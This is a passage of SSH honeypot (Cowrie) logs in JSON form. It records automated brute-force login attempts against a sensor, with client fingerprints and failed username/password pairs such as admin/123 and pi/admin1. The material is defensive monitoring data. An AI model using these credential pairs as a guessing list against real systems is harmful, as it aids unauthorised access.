h-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.487319Z","src_ip":"212.227.125.160","session":"ce67224f68d6"}
{"eventid":"cowrie.login.failed","username":"admin","password":"87654321","message":"login attempt [admin/87654321] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.617886Z","src_ip":"212.227.125.160","session":"ce67224f68d6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.931265Z","src_ip":"212.227.125.160","session":"a36a6d6f6f6e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.959038Z","src_ip":"212.227.125.160","session":"572f7dda2421"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47804,"dst_ip":"1.2.3.4","dst_port":22,"session":"25bc4faa5236","protocol":"ssh","message":"New connection: 212.227.125.160:47804 (1.2.3.4:22) [session: 25bc4faa5236]","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.990179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:02.991074Z","src_ip":"212.227.125.160","session":"25bc4faa5236"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47820,"dst_ip":"1.2.3.4","dst_port":22,"session":"790b65d55d0b","protocol":"ssh","message":"New connection: 212.227.125.160:47820 (1.2.3.4:22) [session: 790b65d55d0b]","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.001220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.021894Z","src_ip":"212.227.125.160","session":"790b65d55d0b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.034232Z","src_ip":"212.227.125.160","session":"25bc4faa5236"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.047847Z","src_ip":"212.227.125.160","session":"790b65d55d0b"}
{"eventid":"cowrie.login.failed","username":"pi","password":"87654321","message":"login attempt [pi/87654321] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.175421Z","src_ip":"212.227.125.160","session":"25bc4faa5236"}
{"eventid":"cowrie.login.failed","username":"student","password":"admin1","message":"login attempt [student/admin1] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.251853Z","src_ip":"212.227.125.160","session":"790b65d55d0b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.384139Z","src_ip":"212.227.125.160","session":"bcd44f30667b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47822,"dst_ip":"1.2.3.4","dst_port":22,"session":"3df5dc641d35","protocol":"ssh","message":"New connection: 212.227.125.160:47822 (1.2.3.4:22) [session: 3df5dc641d35]","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.427568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.433639Z","src_ip":"212.227.125.160","session":"3df5dc641d35"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.477332Z","src_ip":"212.227.125.160","session":"3df5dc641d35"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin1","message":"login attempt [ftpuser/admin1] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.687123Z","src_ip":"212.227.125.160","session":"3df5dc641d35"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.690757Z","src_ip":"212.227.125.160","session":"ce67224f68d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47826,"dst_ip":"1.2.3.4","dst_port":22,"session":"8849b7a8d0b7","protocol":"ssh","message":"New connection: 212.227.125.160:47826 (1.2.3.4:22) [session: 8849b7a8d0b7]","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.743904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.759963Z","src_ip":"212.227.125.160","session":"8849b7a8d0b7"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:03.822706Z","src_ip":"212.227.125.160","session":"8849b7a8d0b7"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin1","message":"login attempt [admin/admin1] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.032413Z","src_ip":"212.227.125.160","session":"8849b7a8d0b7"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.227991Z","src_ip":"212.227.125.160","session":"25bc4faa5236"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47838,"dst_ip":"1.2.3.4","dst_port":22,"session":"834df4e0f244","protocol":"ssh","message":"New connection: 212.227.125.160:47838 (1.2.3.4:22) [session: 834df4e0f244]","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.276516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.295520Z","src_ip":"212.227.125.160","session":"834df4e0f244"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.297370Z","src_ip":"212.227.125.160","session":"790b65d55d0b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.324159Z","src_ip":"212.227.125.160","session":"834df4e0f244"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47852,"dst_ip":"1.2.3.4","dst_port":22,"session":"44140dc92745","protocol":"ssh","message":"New connection: 212.227.125.160:47852 (1.2.3.4:22) [session: 44140dc92745]","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.339819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.344407Z","src_ip":"212.227.125.160","session":"44140dc92745"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.383668Z","src_ip":"212.227.125.160","session":"44140dc92745"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":33982,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e623b12406d","protocol":"ssh","message":"New connection: 201.148.180.50:33982 (1.2.3.4:22) [session: 3e623b12406d]","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.400681Z"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin1","message":"login attempt [pi/admin1] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.491011Z","src_ip":"212.227.125.160","session":"834df4e0f244"}
{"eventid":"cowrie.login.failed","username":"student","password":"123","message":"login attempt [student/123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.567167Z","src_ip":"212.227.125.160","session":"44140dc92745"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.730720Z","src_ip":"212.227.125.160","session":"3df5dc641d35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47868,"dst_ip":"1.2.3.4","dst_port":22,"session":"16cf5f29e164","protocol":"ssh","message":"New connection: 212.227.125.160:47868 (1.2.3.4:22) [session: 16cf5f29e164]","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.772032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.772898Z","src_ip":"212.227.125.160","session":"16cf5f29e164"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.815674Z","src_ip":"212.227.125.160","session":"16cf5f29e164"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123","message":"login attempt [ftpuser/123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.947752Z","src_ip":"212.227.125.160","session":"16cf5f29e164"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42736,"dst_ip":"1.2.3.4","dst_port":22,"session":"90ce8761f8ed","protocol":"ssh","message":"New connection: 212.227.235.229:42736 (1.2.3.4:22) [session: 90ce8761f8ed]","sensor":"my-vps","timestamp":"2025-08-31T07:07:04.999157Z"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.082817Z","src_ip":"212.227.125.160","session":"8849b7a8d0b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47876,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec223d40f955","protocol":"ssh","message":"New connection: 212.227.125.160:47876 (1.2.3.4:22) [session: ec223d40f955]","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.132357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.146407Z","src_ip":"212.227.125.160","session":"ec223d40f955"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.162367Z","src_ip":"212.227.235.229","session":"90ce8761f8ed"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.193367Z","src_ip":"212.227.125.160","session":"ec223d40f955"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123","message":"login attempt [admin/123] failed","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.418604Z","src_ip":"212.227.125.160","session":"ec223d40f955"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.554830Z","src_ip":"212.227.125.160","session":"834df4e0f244"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47884,"dst_ip":"1.2.3.4","dst_port":22,"session":"04e69c5018c0","protocol":"ssh","message":"New connection: 212.227.125.160:47884 (1.2.3.4:22) [session: 04e69c5018c0]","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.615601Z"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.635679Z","src_ip":"212.227.125.160","session":"44140dc92745"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.642549Z","src_ip":"201.148.180.50","session":"3e623b12406d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.643239Z","src_ip":"201.148.180.50","session":"3e623b12406d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:07:05.646751Z","src_ip":"212.227.125.160","session":"04e69c5018c0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh